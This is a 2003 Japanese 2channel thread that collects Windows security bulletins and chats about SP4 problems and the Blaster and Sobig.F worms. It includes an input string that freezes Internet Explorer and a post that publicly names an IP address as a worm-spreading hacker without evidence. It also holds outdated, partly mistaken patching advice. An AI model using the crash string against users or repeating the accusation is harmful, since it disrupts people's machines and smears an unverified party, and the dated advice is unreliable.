スクリプト配布所
http://www.geocities.co.jp/SiliconValley/6705/script.html

複数のメールソフトに不適切なセキュリティゾーンが適用される欠陥
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/07.html#20030701_mail

Windows 2000 Service Pack 4 日本語版
http://www.microsoft.com/japan/windows2000/downloads/servicepacks/sp4/

ここのサイトどうよ？俺たちバカに
してない？
http://island.gaiax.com/home/tuyosi/main

｡�｡�ﾊﾆﾀｯﾉﾜ｡｢ 6ﾆ?､ﾋ･ﾏ･ﾃ･ｫ｡ｼ､ﾎｽｸﾃﾄｹｶｷ筅ﾙｹ�｡?
http://www.hotwired.co.jp/news/news/technology/story/20030703301.html

>>480 はEUC
★★米政府、 6日にハッカーの集団攻撃を警告★★

あぼーん

>>481
何も起こらなかったね。

＜内心期待していた漏れ＞

日本語版の公開間近，Windows 2000 SP4を解説する (公開済みだけど)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030701/1/

SP4を適用する場合の注意点
　過去のサービス・パック同様，Windows 2000 SP4を適用すると問題が発生する場合がある。
原稿執筆時点（2003年6月29日現在）では，「ブートができなくなる」などの大きな問題は発生
していないものの，気になる問題がいくつか報告されている。最新情報は「813432 - Release
Notes for Windows 2000 Service Pack 4」に記載されている。同ページは今後更新されることが
予想されるので，できるだけ頻繁にチェックしたい。
(略)
　同ページの「その他（Other）」にある「820101 - Frequently Asked Questions About
the Microsoft VM and Windows 2000 Service Pack 4」も気になるタイトルである。(略)
ドキュメントには，以下のような情報が記載されている。
（1）Microsoft VM は，Windows 2000 SP4によってインストールされないし，更新も削除もされない
（2）Microsoft VM を構成するファイルは，Windows 2000 SP4を適用すると，Windows File Protection
（WFP）によって保護されなくなる
（3）Microsoft VM がインストールされている Windows 2000 SP4 適用後のシステムにおいては，
Microsoft VM のセキュリティ更新（パッチ）を自分で適用し続けることはとてもよい考え
（very good idea）である。Windows Update の利用により，Microsoft VMを更新し続けることができる (略)

SP4に含まれないセキュリティ・パッチ
(略)
　つまり，Microsoft VMがインストールされていて，なおかつ「MS03-011」を適用していない場合には，
「MS03-011」を適用する必要がある。ただし，注意点がある。(略)
このページに置かれているパッチは，Windows 2000 SP2／SP3用だからだ。 (略)

Win2k/XPでIEのアドレスバーに「C:\AUX」と入力するとIEが固まる。
リンク先の記事ではXP+IE6としか書いてないが、Win2k+IE5、5.5、6.0でも再現する。
ttp://lists.netsys.com/pipermail/full-disclosure/2003-July/010964.html

エンタープライズ：Internet Explorer 6が「c:\aux」でフリーズするバグ
http://www.zdnet.co.jp/enterprise/0307/08/epn16.html
http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20030708_aux (セキュリティmemo)

これも張っとく。一応
すぐにでもブラクラ化されそうで、怖い怖い

広範なWindowsプラットフォームに「緊急」の脆弱性
http://www.zdnet.co.jp/enterprise/0307/10/epn03.html

★Windows Server 2003 などに3種類の深刻なセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030710/3/

★だからマイクロソフトは嫌われる？-セキュリティ担当者の呆れた弁解
http://japan.cnet.com/news/ent/story/0,2000047623,20059757,00.htm

この修正を含む予定のサービス パック :
この問題に対する修正プログラムは Windows 2000 Service Pack 4 に含まれています。
この問題に対する修正プログラムは Windows XP Service Pack 2 に含まれる予定です。

Windows のバッファ オーバーランによりデータが破損する (817606) (MS03-024)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-024.asp
登録日 : 2003/7/10 更新日 : 2003/7/10
脆弱性の影響 : 攻撃者の任意のコードが実行される
推奨する対応策 : 管理者は、この修正プログラムをインストールすることを検討してください。
絵でみるセキュリティ情報 : イラストを交えたセキュリティ情報は次のサイトをご覧ください。
http://www.microsoft.com/japan/security/security_bulletins/ms03-024e.asp
影響を受けるソフトウェア :
　Microsoft Windows NT Server 4.0
　Microsoft Windows NT Server 4.0, Terminal Server Edition
　Microsoft Windows 2000
　Windows XP Professional
影響を受けないソフトウェア :Microsoft Windows Server 2003

深刻度 :対象プラットフォーム全て 重要

修正プログラム :
(リンク先省略、詳細は上記リンク先をご覧下さい。WinNT4TSE以外はWIndowsUpdateからも適用可能です。)

この修正プログラムはWindows NT Server 4.0 Service Pack 6a 、Windows NT Server, Terminal Server Edition
Service Pack 6 、Windows 2000 Service Pack 3 、Windows XP または Service Pack 1 を実行しているコンピュータに
インストールすることができます。

対象プラットフォーム :
Windows 2000 Service Pack 3 を実行しているコンピュータにインストールすることができます。
さらに、この問題に対する修正は Service Pack 4 に含まれています。

ユーティリティ マネージャによる Windows メッセージ処理の問題により、権限が昇格する (822679) (MS03-025)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-025.asp
登録日 : 2003/7/10　更新日 : 2003/7/10
最大深刻度 : 重要
推奨する対応策 : お客様は早期に修正プログラムをインストールして下さい。
絵でみるセキュリティ情報 : イラストを交えたセキュリティ情報は次のサイトをご覧ください。
http://www.microsoft.com/japan/security/security_bulletins/ms03-025e.asp

影響を受けるソフトウェア :　Microsoft Windows 2000
深刻度 :　Windows 2000 重要
修正プログラム :
Microsoft Windows 2000:
http://microsoft.com/downloads/details.aspx?FamilyId=D415A4AC-E13A-4E8A-BE25-85E7DF686F61&displaylang=ja
Windows Update からインストールすることもできます。

　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　（ ´Д｀ ）

　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　（ ´�D｀ ）

あぼーん

>>487-488 がらみです。

HTML コンバータのバッファ オーバーランにより、コードが実行される (823559) (MS03-023)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-023.asp
登録日 : 2003/7/10　更新日 : 2003/7/11

脆弱性の影響 : 攻撃者の選択したコードが実行される可能性があります
最大深刻度 : 緊急
推奨する対応策 : システム管理者は直ちに修正プログラムを適用して下さい。
影響を受けるソフトウェア :
Microsoft Windows 98
Microsoft Windows 98 Second Edition
Microsoft Windows Me
Microsoft Windows NT 4.0 Server
Microsoft Windows NT 4.0, Terminal Server Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003

深刻度 :
Windows Server 2003 警告
その他の影響を受けるバージョンのWindows 緊急

修正プログラムに関する追加情報 :
対象プラットフォーム :
Windows 98、Window 98 Second Edition、Windows Me、Windows NT 4.0 Service Pack 6a、
Windows NT 4.0, Terminal Server Edition Service Pack 6、Windows 2000 Service Pack 3
または Service Pack 4、Windows XP または Windows XP Service Pack 1、Windows Server 2003
を実行しているシステムにインストールすることができます。

あぼーん

あげ

愛想が尽きた　ＭＳ　　

98使ってる人はアップデートできたのかな？
サポートが６月いっぱいで終わるようなこと聞いてたんだけど。

田口さんがんがれ！

500(σ^▽^)σｹﾞｯﾂ!!

★「虚偽の件名を付けたスパム・メールが今年前半で50％以上増加」
http://biztech.nikkeibp.co.jp/wcs/j/inet/256610

あぼーん

あぼーん

あぼーん

あぼーん

あぼーん

ここはホントにセキュリティ情報スレなのか？

広告等、ごみがあるが忍耐ぢゃ

>>498
98S.E. だけどアップデートできたみたい。

　__∧＿∧_
　|（　　＾＾ ）|　＜寝るぽ（＾＾）
　|＼⌒⌒⌒＼
　＼ |⌒⌒⌒~|　　　　　　　　　山崎渉
　　 ~￣￣￣￣

山崎の野郎、まだやってるのか。

あぼーん

あぼーん

ウイルスバスターオンラインスキャンのActiveX コンポーネントの
メモリバッファオーバーフローを原因とする脆弱性について
http://www.trendmicro.co.jp/hcall/overflow.asp

トレンドマイクロ方面: パターンファイル650番以降をダウンロードできない
(トレンドマイクロ, 2003.07.14)
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/07.html#20030714_trend

トレンドマイクロ方面で、パターンファイル 650 以降をダウンロード・インストールできない
という状況が発生することがある模様。最新のセキュリティパッチを適用すればよいみたい。

SNS Advisory No.65
Windows 2000 ShellExecute() API Let Applications to Cause Buffer Overflow
http://www.lac.co.jp/security/intelligence/SNSAdvisory/65.html

概要:
Windows 2000 の ShellExecute() API には、Buffer Overflow を発生させてしまう問題があります。
対策:
Windows 2000 Service Pack 4 を適用することでこの問題を解消することができます。

Windows2000 SP4 関連トラブル

バーチャルネットハッカーっ娘 沙耶16歳　-　Win2000 SP4の罠
http://saya.c-moon.jp/index.php?d=200307-A&cid=7-01#7-01
イ奄の中の人さん：我慢できず入れちゃって不安定。更新もままならないそうです。
電脳御殿さん（日記2003/7/4分）：かつてからUSBまわりに不具合があったが、結局解決せず。
hidakaさん（2003/7/3〜4)： HDDとびました…。
(7/12追記)雛姫さん：ブートしなくなりました→SafeModeで起動してアンインストールでなんとか復活

NTBUGTraq
SP4 - memory parity errors reported? (F0 0F bug style)
http://archives.neohapsis.com/archives/ntbugtraq/2003-q3/0001.html
Alexa Adware in W2K SP4
http://archives.neohapsis.com/archives/ntbugtraq/2003-q3/0006.html

セキュリティホールmemo
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/07.html#20030707_w2ksp4
「以前に問題起こさなかったフォームを開こうとすると、メモリ不足というメッセージと、
C++ランタイムエラーを発生させる事態を見つけました。」

Windowsに新たな「緊急」の脆弱性
http://www.zdnet.co.jp/enterprise/0307/17/epn02.html

「MS03-026: RPC インターフェイスのバッファ オーバーランによりコードが実行される (823980)」に関する要約情報
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-026ov.asp

「MS03-027: Windows シェルの未チェックのバッファによりシステムが侵害される (821557)」に関する要約情報
http://www.microsoft.com/japan/technet/security/bulletin/MS03-027ov.asp

「MS03-028: ISA Server のエラー ページの問題により、クロスサイト スクリプティング攻撃が実行される (816456)」に関する要約情報
http://www.microsoft.com/japan/technet/security/bulletin/MS03-028ov.asp

あぼーん

昨日、アップデートしたばかりなのですが本日>>518>>519を発見しました。

32 bit Edition
64 bit Edition
これ
自分のバージョン情報を見ると32でも64bitでもないのですが
WindowsUpdateで特に更新するものはありませんという表示がでれば
それでいいのですよね？よくわからなくて。

32bitをいれておけ

>>522
遅レスですみません。サンクスです。

サウンドブラスターliveの最新デバイスをインストールしたら、
devldr32関連で窓が終了できなくなりました。
で、そのときにウイルスバスターも反応。
ウイルス検索をしてもウイルス見つからないし・・・
過去ログに「devldr32」についての話題が少しありましたが、
ウイルスではなくドライバ関連なのでしょうか？

IE6 SP1にファイルがダウンロードできない問題が発覚
http://pcweb.mycom.co.jp/news/2003/07/18/28.html

対象となる環境は、IE 6.0 SP1をインストールしているWindows 98SE/Me/2000 SP2、SP3/XP、XP SP1/NT 4.0 SP6a。

　　_, ,_
　( ´_ゝ`)

嫌な話だな。

Windowsとは全く関係ありませんが、おたくのCiscoルータ／スイッチの
IOSのアップデートはご確認済みでしょうか。

■ Cisco Security Advisory: Cisco IOS Interface Blocked by IPv4 Packet
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/07.html#20030717_cisco
Cisco IOS を塔載した Cisco ルータおよびスイッチに欠陥。 IPv4 を処理するよう設定されている場合
(ふつうは設定されてるだろう)、稀な一連の IPv4 パケット (A rare sequence of crafted IPv4 packets) を
直接ルータ/スイッチに送ると、その結果、その入力インターフェイスにおける処理が停止、
使用不能攻撃が成立する。これは reboot させないと直らない。

exploitがすでに出てます。ご確認されることを推奨します。

(^_^)Windowsのパスワードを僅か数秒で解読

http://headlines.yahoo.co.jp/hl?a=20030723-00000008-cnet-sci

Microsoftがパスワードをエンコードするやり方には、いつくかの弱点があり、
このような解読テクニックをとりわけ有効なものにしてしまう.

>>528
つまりエンコードしたパスワード、UNIXで言う/etc/passwdの内容が有れば
ランダムな文字列でも数秒で解読する事ができるって事かな？

DirectXに「緊急」の脆弱性
http://www.zdnet.co.jp/enterprise/0307/24/epn03.html

「MS03-030: DirectX の未チェックのバッファにより、コンピュータが侵害される (819696)」
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-030ov.asp

Windows2000ユーザーです。

先ほどwindowsUpdateしたらDirectX9.0bがインストールされました。
公式逝ってもDirectX9.0aしかなかったので一応（怖いので）お知らせしときます

ってさっきUpdeteしたのにまたUpdateかよ！

Updete

>>533
つっこむな

インターネット業界トラブルニュースさん、ある通信社から著作権侵害とのクレームを受け閉鎖
http://www.geocities.co.jp/SiliconValley-SanJose/1394/

◆WindowsのDirectXに「緊急」のセキュリティ・ホール，すべてのユーザーが影響

◆SQL Serverにも「重要」のセキュリティ・ホール

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030724/1/

>>536の香具師のリンク張っとく
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-030ov.asp

「MS03-029: Windows の機能の問題により、サービス拒否が起こる (823803)」に関する要約情報です。
http://www.microsoft.com/japan/technet/security/bulletin/MS03-029ov.asp

「MS03-031: Microsoft SQL Server 用の累積的な修正プログラム (815495)」に関する要約情報です。
http://www.microsoft.com/japan/technet/security/bulletin/MS03-031ov.asp

WIndowsとはそんなに関係ないですが、CGIでよく使われるらしい
スクリプト、CGI.pmにクロスサイトスクリプティング脆弱性があるようです。
CGI 職人、あるいはCGI使われている方々は最新のバージョンに
アップデートすることを推奨します。

http://archives.neohapsis.com/archives/bugtraq/2003-07/0267.html

★またも相次ぐMS発のセキュリティ警告★

http://www.zdnet.co.jp/enterprise/0307/24/epn06.html

中には、大半のWindowsマシンに影響する最大深刻度「緊急」の脆弱性が含まれる。

元荒らし「自衛隊のFLASH観察」住人監視所
http://tmp.2ch.net/test/read.cgi/tubo/1059039798/138

MSもセキュリティーホール総合情報ページを公開！？

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030725/1/

　　なんだかなー

さすらいおはよう（ﾜﾗ
ﾃﾙｸﾉはるのくんホストクラブ言ってみ（ﾜﾗ

http://memo.st.ryukoku.ac.jp/archive/200307.month/6243.html
Windows 2000 SP4 -> IE6SP1 の順にインストールすると cryptdlg.dll が
ダウングレードするというのを確認してます。しかし、HFNetChk は検出
しません。


だそうです。要注意。

あぼーん

age

あぼーん

／￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
|　ほう、Proxy 検索スクリプトで 2ch で自作自演ですか？
＼
　 ￣￣￣|／￣￣￣￣￣￣￣￣￣￣￣￣
　　∧＿∧　　　　　　　／￣￣￣￣￣￣￣￣￣￣￣￣
　 （　・∀・）　 ∧ ∧ ＜　な、なんですか。あなたは！
　（　　⊃ ）　 (ﾟДﾟ；)　　＼＿＿＿＿＿＿＿＿＿＿＿＿
￣￣￣￣￣ （つ＿つ＿＿
￣￣￣日∇￣＼| BIBLO |＼
　　　 　 　￣　　　=======　　＼

http://pc2.2ch.net/test/read.cgi/php/1060009605/368-

368 名前：nobodyさん sage 03/08/05 (火) 22:28 ID:???
取り敢えずできました。物が物だけに、アレなので
2:00にデリします。

↑なんか、かなりのスクリプト公開＆開発してるらしい

保守しておくか。

【緊急】Windows RPCの脆弱性狙ったワームが拡散を開始 8/12
http://news2.2ch.net/test/read.cgi/newsplus/1060648014/
【ネット】「ぬるぽ」 Winnyで広がるワームが出現 ★２ [8/9]
http://news2.2ch.net/test/read.cgi/newsplus/1060611700/

【セキュリティ】ウイルス「Blaster」 警察のコンピュータにもアクセス１万件
http://news2.2ch.net/test/read.cgi/newsplus/1060781039/

あぼーん

あぼーん

あぼーん

あぼーん

保守

超ガイシュツとは思うけど一応カキコしときます。

図まで入って開設されています。
素人さんでも、これ見れば一発ですね。
http://www.microsoft.com/japan/technet/security/virus/blaster.asp

>>557
しかし・・・コネクターの抜き方まで解説してある。

コレ見ても「わかんな〜い♪」だったらネット止めれ・・・

win2000のパッチファイル
Windows2000-KB823980-x86-JPN
は、sp3があたってないと無効なのですか？

Windows Updateするだけじゃだめなの？

updしないで、
Windows2000-KB823980-x86-JPN
をあてるだけはだめなの？
updは時間かかるので・・・・
100台世話してんのよ

誰か　ウィルス持ってなーい
　　　　　　
　　　　　　　　　　upしてー

>>560
>557　見れ

>563
あんがと・・・
でも　「SP4適用・・・」だったらpatchあてる必要ないんじゃないかな
sp4は026対応でしょ

Windows 2000 をお使いの場合は、Serverce Pack 2、Service Pack 3
または 4 を適用する必要があります。
Service Pack は、以下から入手可能です。
できる限り最新の Service Pack を適用することをお勧めします。

あぼーん

あーめんどくさい

さっきから、WindowsUpdateからのアクセスが凄いんですけど。
確認したら「重要な更新はありません」。
小さい更新（？）もしろよー！って事じゃないよね？

あぼーん

じゃないってことにしとこう

http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-026ov.asp
でｗマークがついてるからだいじょうぶみたいだ。

あぼーん

あぼーん

>>564
sp4にMS03-026は含まれていないぞ
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/fix/win2ksp4.asp

>573
あんがと
これみると、sp4っていったい何なの・・・・
win2000の最終っていうか、かんぺきバージョンは、
sp4+（>573の修正patchぜ〜んぶ）っていう事かな
これやってらんないよ

sp4+（>573の修正patchぜ〜んぶ）って
みんな知ってるのかな、知らないの漏れだけ

>>574=575
Service PackとHotfixの役割の違いはアナウンスされているはずだが。

あと、SP4のあとにWindows Updateすりゃいいだけなんだから、
別にやってられないなんてこともねーだろ。
個別に落とすにしても、大した量じゃねえよ。
http://www.microsoft.com/japan/enable/products/security/proglist.asp?prod=002&info=5

100台あるのに、やってられるか！
これ一発でupdっていうのないの？

>>559
マイクロソフト セキュリティ情報 (MS03-026) ： よく寄せられる質問
http://www.microsoft.com/japan/technet/security/bulletin/fq03-026.asp

Q.この修正プログラムは Windows 2000 Service Pack 2 でサポートされますか？
A.このセキュリティ修正プログラムは、Windows 2000 Service Pack 2 にインストールすることができます。
しかし、マイクロソフト サポート ライフサイクル ポリシーに従い、このバージョンは現在サポートの対象と
なっておりません。また、このセキュリティ修正プログラムに関しては、Windows 2000 Service Pack 2 上
では最低限のテストのみが行われています。Windows 2000 Service Pack 2 をご使用のお客様は、
できるだけ早期にサポート対象の Service Pack にアップグレードすることを強く推奨します。

Q.MS03-026 の修正プログラムがインストールされていないシステムの存在をネットワーク内でスキャン
するために使用するツールは利用可能ですか?]
A.はい。マイクロソフトは MS03-026 の修正プログラムがインストールされていないシステムの存在を
ネットワーク内でスキャンするために使用するツールをリリースしました。
注意 : このツールは英語版ですが日本語環境でも使用することができます。ただし、ホスト名に
日本語 (MBCS: Multi Byte Character Set) を使用することは出来ません。
このツールに関する追加情報はマイクロソフト サポート技術情報 826369 をご覧ください。
http://support.microsoft.com/default.aspx?scid=kb;ja;826369

>>577
SUS（Software Update Services）などをご検討下さい。
http://www.atmarkit.co.jp/fwin2k/operation/hotfixman/hotfixman_03.html

【鶴OFF】広島の平和祈念公園で胴上げ【ぶち壊し】
http://news4.2ch.net/test/read.cgi/news/1061055661/l50
http://off.2ch.net/test/read.cgi/offmatrix/1061063904/
http://jbbs.shitaraba.com/computer/bbs/read.cgi?BBS=4633&KEY=1061058905

胴上げされてたのは「広島へなちょこ ◆Z4C5PzwlT.」←らしいが、
全国の鶴を折ってくれた人、色々協力してくれた人にさえ謝罪する気は無いのか？

あぼーん

今使っている家のＰＣはアップデートソフトが入っているのでＳＰやセキュリティ関係のソフトが
出れば勝手にダウンロードしてくれるが、職場のＰＣはインターネットにつながらないので全然
していないな。
社内ＬＡＮの管理者にインターネットに接続できるようにしてほしい、とかけあってみたが
「新しいものは次々出るからきりがない、古い物でも使えれば良いのでは？」と全く理解せず。
こういうＰＣ同士でファイルを交換すると古典的なファイルタイプのウイルスが感染し、
大ダメージ（というより恥）を受けたりしますね。

あぼーん

会社のPCは、外部には接続できないが、外部からは接続できるという仕組み、
もちルーター越しで壁はあるが、
UPDやHotfixは、各自がserverからDLの指示を出しますが
おじんは何がなんだかわからんようで、まったく何もできないPCも多い
コギャルは即やってくれます。

あぼーん

XPを使ってますが、修正プログラムは入れたのですが
ほかにブラスターの感染を防ぐためになにかインストールとか
したほうがいいことはありますか？教えてください。

あぼーん

あぼーん

>>586
http://internet.watch.impress.co.jp/cda/special/2003/08/13/133.html

ポート塞ぐ。基本。

ネットでポート塞いだらイイと書いてあったので、パッチを当てた上でポートも塞いだら、
今度はフォルダを共有できなくなっただのプリンタが使えなくなっただの言い出す奴が、
今日あたりから続出してきそうな悪寒。

寒い駄洒落だ。

ITPro ニュース:MSがWindows XPのファイアウオールのデフォルト設定を変更へ
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030818/1/

セキュリティ板で祭り中！
亜種ﾊｹｰﾝの一部始終

msblast対策スレ【ICMP祭り開催中】3日目！
http://pc.2ch.net/test/read.cgi/sec/1061205064/379-

あぼーん

>>586
インターネット接続FWの使用…とか？？
ポート135とか弾くようにすればいいかもしれんよ。

>ほかにブラスターの感染を防ぐためになにかインストールとか
>したほうがいいことはありますか？教えてください。

パッチ当てたなら、とりあえずそれ以上することは何もない。

ﾄﾚﾝﾄﾞでHKTL_DCOM.Y
ってよんでるﾄﾛｲってどのようなものでしょう・・・？
ﾄﾚﾝﾄﾞのｻｲﾄで検索できない（泣

あぼーん

しかし、いったいどういう人がブラスターに
感染するんですかい
住基ネットに感染する恐れがあるからって
どういう使い方してんだろう
放置状態でさらしておかないと感染せんだろう

MSから同じ内容のメールが24件届いた・・・。
一体どういうこと？
他に同じ症状が出た人いる？

あぼーん

うちにも嫌がらせメールが8件届きましたよ。
勘弁してくれー

フレッツADSLなんですが、すんげぇ重いんすけどこれも影響？ PC使い物にならんし、ISPのサポート見れんし、電話つながらない。 一応対策済み。

あぼーん

pingいっぱい来やがって、糞重いぞ
やっぱ、亜種ですか

>>600
うちもです。
ウイルスとは関係ないんでしょか？
気になります。
受取拒否にしましたが

>>600
メッセンジャーのアップデートしろみたいなヤツ？
メッセンジャーのスレッドそれでいっぱいになってたよ。

そういううちももう２０通くらい来てるな。
ええかげんにせい！

あぼーん

>605
俺もping来まくりだよ。
亜種なのか…

＞メッセンジャーサービスからのメール大量送信について

今俺も受信トレイ開いてびびった。同士を求め、ここに来たのだが…。
ひどいなマイクロソフト。とうとう狂いだしたか。

うちにもping大量に来てる…
ＦＷが抑えてくれるが、かなりウザい。

あぼーん

あぼーん

McafeeFirewallを使っています。
ここ2,3日以上なくらいping大量に来てるかなりウザい。

俺も思わずApacheのログなんか見てみたらwin98IEのUAで大量に来ているよ

download.Dlucaというウイルスにやられましたが
ノートン先生が駆除してくれません。
winde.exeも削除できません。
どうしたらいいんでしょう。

テレフォン♪

>>606
俺も最初に見たときはブラスターか！？
やられた！と思いましたが違うようです。
>>607
そうそう、メッセンジャー云々ってやつですよ。
今、PC立ち上げて再度メールチェックしたら追加で5件も・・・
合計29件の同じメールが来ました。

一体コレは何？MSの嫌がらせですか。

Win2000ですが、HotFixとかSP4とかを入れようとすると、「カタログファイルが
インストールできませんでした」って言われて中断してしまいます。
自分なりに調べて、ＰＣの時計を戻したりロケール情報のレジストリを復活させたり
しましたが、症状変わりません。
もうＯＳの再インストールしか無いですか？

>もうＯＳの再インストールしか無いですか？
インストール直後のインストールイメージを残していないなら、そうだね。

約十秒に一回ペースと言う、異常な回数の
ポートスキャンをされているのだが
これはいったい・・・？

ファイヤーウォールで防いではいるが
この異常なまでの頻度、気持ちが悪い

>> 597
あっ、さっき、それ俺も出てきました...

RPC DCOMバッファーオーバーフローを利用したハッキングツールで、
権限を乗っ取られて、何でもやり放題になってしまうらしいっす...

情報を盗まれる恐れがあるので、至急、駆除した方がいいよ...

詳しくは下記を参照
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=HKTL_DCOM.Y&VSect=T

>>597
>>622
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HKTL_DCOM.Y

自分とこは９８なんで関係ないやと思ったが、
昨日の夜接続したら、数十秒〜数秒１度くらいの異常なペースで
ping刺されまくって痛かったです・・・
そして今もまた十秒１度くらいの割合で来てる

今のところファイアウォールがブロックしているが、
もしかしてネット全体がこんな感じなのか？
もしかして亜種の影響ってヤツなのか？

ルータのｌｏｇにこんなのあるんですが、やばいんですか？

Unrecognized access from 69.34.51.191:15936 to UDP port 137
Unrecognized access from 151.197.60.145:2283 to TCP port 135
Unrecognized access from 210.153.71.211:2491 to TCP port 135
Unrecognized access from 61.190.141.134:1028 to UDP port 137
Unrecognized access from 138.89.168.162:1028 to UDP port 137

あぼーん

あぼーん

ISDNフレッツです。
頻繁に接続アイコンが青⇒黒になりますが
アタックされまくりでこのような状態なのでしょうか。
誰か教えてください。

600さん
違うんですか、安心しました。
どうもありがとう。

「ソビッグＦ」巻いてる　
ハッカーのＩＰ晒します
　　　
68.83.58.234

危険度Ｓ　ウィルス　クラッシュ　　
　　　

>>619
SP統合CDを作った上でクリーンインストール。

>>621
俺のルータのログを見ると、135ポートに３回アタックして失敗だったらあきらめているようだ。

「windows updateとかしてます？」
「何それ？買ったお店とかに持って行ってやってもらうの？」
「・・・。昨日の夜なんかいっぱいアタックとかありましたね」
「ウイルスなの？それってインターネットで感染するの？
それともメール？」
「・・・」
「俺たまにしかインターネット繋がないしさ。大丈夫でしょ。
パソコンの中にデジカメ画像とかしか入ってないから」

もしネット全く利用しなかったらwindows updateって不要
なんでしょうか？

>>632
そうだけども、ちょっとでもつなぐことがあるなら、必須。
店頭でウイルス対策CDを無償配布するみたいだし（Yahoo!JAPANでの情報）
、すべての2000/XPユーザを対象にしてはいる模様。

あぼーん

あぼーん

会社のパソコン、ダイヤルアップなんだけど、
RedCodeやスラマーは何もなかったけど
今回のブラスターは影響受けた。

あぼーん

めちゃめちゃ来ているな。ログがMSブラスト系ばっかりになってる。

>>623
�dｸｽ

isdnは回線が遅いから安心
adslとか光にするからだよ

アナログは安心

あぼーん

ダイヤルアップでたまにつなぐって言う人、けっこう危ないんじゃないですか。

某厚生大臣は、ダイアルうｐで感染したんじゃなかったか

対策取らず、ネットに繋がってればそのうち感染するだろ。
回線速度は関係ない。

自分が時々出入りする初心者BBSで、Blaster騒ぎの後から急に
セキュリティ情報を書き込みするﾔｼが現れて
それに「さっそく友達にメールします」とかレスがついてるのを見て

今、新しいデマウィルスができたら、簡単に蔓延しそうだなあ

と思った自分の心はすさんでいるのだろうか？
でも、今の、今まで全く何も知らなかったﾔｼが、にわかに情報を仕入れて
人に教えよううとする状況って、違う意味で危険かもしれないと思う次第。

そりゃあ全くそのとおりだな。
セキュリティ意識自体が高まるのは悪いことではないのだが、
教育費がヘンに高くついたりするからなあ。

IEに「緊急」の脆弱性、累積パッチリリース
http://www.zdnet.co.jp/enterprise/0308/21/epn02.html

ワームの勢いはとどまらず、今度はSobig.Fの感染拡大
http://headlines.yahoo.co.jp/hl?a=20030822-00000098-myc-sci
トロイの木馬も含む？　日本でも広まるSobig.F
http://www.zdnet.co.jp/enterprise/0308/22/epn08.html

＜ブラスター＞自治体のウイルス感染拡大　「ウェルチア」も拡大
http://headlines.yahoo.co.jp/hl?a=20030822-00002098-mai-soci

あぼーん

あぼーん

上の方で「○秒間に○回もping打たれてます、大変です」
なんて言ってる奴いるけど、別に気にする必要ない。
FWやルーター入れてるならなおのこと気にしなくて良い。

F5食らってサーバーがまともに動かなくなったとかならまだしも
個人PCで、ping怖い、ポートスキャン気味悪いとか、ガタガタぬかすな。

ガタガタ・・

http://tv3.2ch.net/test/read.cgi/geinin/1060061213/541
２ちゃんねるで今度はハイジャック予告

>>652
( ﾟ,_ゝﾟ)ﾊﾞｶｼﾞｬﾈｰﾉ

ウェルチアについて
http://cgi.www5e.biglobe.ne.jp/~ailes/comchatg.cgi

大日本帝國万歳！！
http://members.tripod.co.jp/almond_choco11/kaiten.swf
http://noigel.hp.infoseek.co.jp/swf/kakutatakaeri.swf

AUAgent.exe　ってなんですか？

21日にMDACに関するセキュリティーホールが、全部のWindowsに関係するんで、
さらにやりかたによってパッチが当たらないんで、緊急に修正されてから
どうよ？一般には関係することなの？

日本語で書いてくれ。

>>658
もうちょっとわかりやすく書いてくれ。

>>659
ttp://internet.watch.impress.co.jp/cda/news/2003/08/22/220.html
これだろ。

テディベアのアイコンを開くな、ってウィルス情報メールが取引先から
来たけど、これってチェーン？

>>661
ドラえもんの最終回並に古くて有名なチェーンメール

>>662
申し訳なかったです。「jdbgmgr.exe.」で検索かければ一発了解でしたね。
わざわざレス、まことに感謝です。本当に初心者なもので恥ずかしいです！

　　　　　　　　　　　|ﾄﾞﾝﾄﾞﾝ!!　　　　　　　　　ｱﾋｬｰﾋｬﾋｬﾋｬﾋｬ!!
　　　　　　　　　　　|ヾ（ﾟ∀ﾟ）ﾉ　ﾄﾞﾝﾄﾞﾝ!!　　　　　ｱﾋｬｰﾋｬﾋｬﾋｬﾋｬ!!
　　ﾋｨｨｨｨ 　　 　 　 |　 （　　） ))　　　　　　　ｱﾋｬｰﾋｬﾋｬﾋｬﾋｬ!!
（´Д｀；）　 　　　 　|((　<　<　　　　　　　　ｱﾋｬｰﾋｬﾋｬﾋｬﾋｬ!!
（∩∩ﾉ）　　　　　　　　　↑
　　↑　　　　　　　ぽーとすきゃん
　ぱそこん

>664
激藁
ってか、笑いが止まんないよ！

updateで更新をスキャンするをクリックすると、更新をスキャンできないとエラー表示が
出てしまいます。今までちゃんとスキャン出来てたのになぜか判る方
アドバイスお願い致します。

Yahoo!のホスト名(IPアドレス)を持ったPCからのアタックがほとんど
ウィルスに感染したPCを繋ぎっ放しにされているのをほっといていいの
ねぇ、孫さん

こんなのあるよ！
http://mishmash.mine.nu/rank

http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=6c050fe3-c795-4b7d-b037-185d0506396c
更新点不明ですが。。

>>669 早速お返事39です。教えてもらった通りアクセスしましたが
既にインストール済みでした。最終更新は今年の５月位なのでそれ
以来更新出来ません。今きずいた事ですがlive up dateも無いよう
